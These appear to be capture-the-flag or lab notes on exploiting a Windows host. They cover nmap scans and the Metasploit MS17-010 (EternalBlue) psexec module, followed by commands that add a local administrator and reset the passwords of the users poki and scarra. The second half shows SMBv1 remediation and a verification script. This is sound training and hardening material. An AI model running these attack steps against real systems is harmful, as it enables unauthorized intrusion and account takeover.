# basic port scan
sudo nmap -sS <target-ip>
# script scan port 80
sudo nmap -sV -sC -p 80 <target-ip>
# vulnerability scan of the SMB port (quote the glob so the shell does not expand it)
sudo nmap -sV -p 445 --script "smb-vuln*" <target-ip>
A password for the user scarra was found during HTTP enumeration, and the SMB scan shows the server is running SMBv1 and is vulnerable to MS17-010 (EternalBlue).
# metasploit attack to establish a foothold
sudo msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_psexec
# RHOSTS is the current option name; RHOST is only kept as an alias in newer versions
set RHOSTS <target-ip>
set LHOST <attack-ip>
# if the module reports no accessible named pipe, also set SMBUser scarra and SMBPass to the password found above
exploit
# drop from meterpreter to a Windows command shell and create a local administrator user
shell
net user <username> <password> /add
net localgroup administrators <username> /add
# change password of poki and scarra
net user poki <password>
net user scarra <password>
# find all flags
cd C:\
dir flag*.txt /s
# access machine with xfreerdp
xfreerdp /u:<username> /p:<password> /v:<target-ip> /size:90%
# run PowerShell as administrator and disable SMBv1 (this optional-feature name applies to Windows client SKUs;
# on Windows Server the feature is FS-SMB1 and is removed with Uninstall-WindowsFeature or the Server Manager steps below; reboot afterwards)
Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
From the Microsoft documentation on disabling SMBv1 on Windows Server through Server Manager:
- On the Server Manager Dashboard of the server where you want to remove SMBv1, under Configure this local server, select Add roles and features.
- On the Before you begin page, select Start the Remove Roles and Features Wizard, and then on the following page, select Next.
- On the Select destination server page under Server Pool, ensure that the server you want to remove the feature from is selected, and then select Next.
- On the Remove server roles page, select Next.
- On the Remove features page, clear the check box for SMB 1.0/CIFS File Sharing Support and select Next.
- On the Confirm removal selections page, confirm that the feature is listed, and then select Remove.
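Added example, not part of the original notes: a PowerShell script for the patched target that reports the SMBv1 state, disables it on either a server or a client SKU, and confirms the result. It assumes an elevated session on Windows 8.1 / Server 2012 R2 or later (where the Smb* cmdlets exist); the feature names FS-SMB1 and SMB1Protocol and the cmdlets are real, the surrounding structure is my own.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original walkthrough). Assumes Windows 8.1 / Server 2012 R2 or later.

# 1. Report the current server-side state; EnableSMB1Protocol should end up False.
$before = (Get-SmbServerConfiguration).EnableSMB1Protocol
"SMB1 enabled on the server before: $before"

# 2. Optional caveat for production hosts: audit who still speaks SMB1 before turning it off
#    (Server 2016 / Windows 10 and later). Clients show up as event 3000 in the
#    Microsoft-Windows-SMBServer/Audit log after a few days of normal use.
# Set-SmbServerConfiguration -AuditSmb1Access $true -Force
# Get-WinEvent -LogName Microsoft-Windows-SMBServer/Audit -MaxEvents 50

# 3. Turn the SMBv1 server protocol off; this takes effect without a reboot.
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# 4. Remove the feature itself so a single registry change cannot re-enable it.
#    Server and client SKUs expose it under different names (ProductType 1 = workstation).
$isServer = (Get-CimInstance Win32_OperatingSystem).ProductType -ne 1
if ($isServer) {
    # Same feature the Server Manager wizard lists as "SMB 1.0/CIFS File Sharing Support"
    if ((Get-WindowsFeature -Name FS-SMB1).Installed) {
        Uninstall-WindowsFeature -Name FS-SMB1
    }
} else {
    # Client SKU: the optional feature used in the notes above
    if ((Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol).State -eq 'Enabled') {
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
    }
}

# 5. Verify. The protocol flag flips immediately; the feature removal needs a reboot to unload the driver.
$after = (Get-SmbServerConfiguration).EnableSMB1Protocol
"SMB1 enabled on the server after: $after"
if ($isServer) {
    "FS-SMB1 installed: $((Get-WindowsFeature -Name FS-SMB1).Installed)"
} else {
    "SMB1Protocol state: $((Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol).State)"
}
"Reboot to complete the feature removal."
```

After the reboot, re-run the nmap line from the notes (`--script "smb-vuln*"` against port 445) from the attacking host; the smb-vuln-ms17-010 check should no longer report the host as vulnerable, and `smb-protocols` should list only SMB 2.x/3.x dialects.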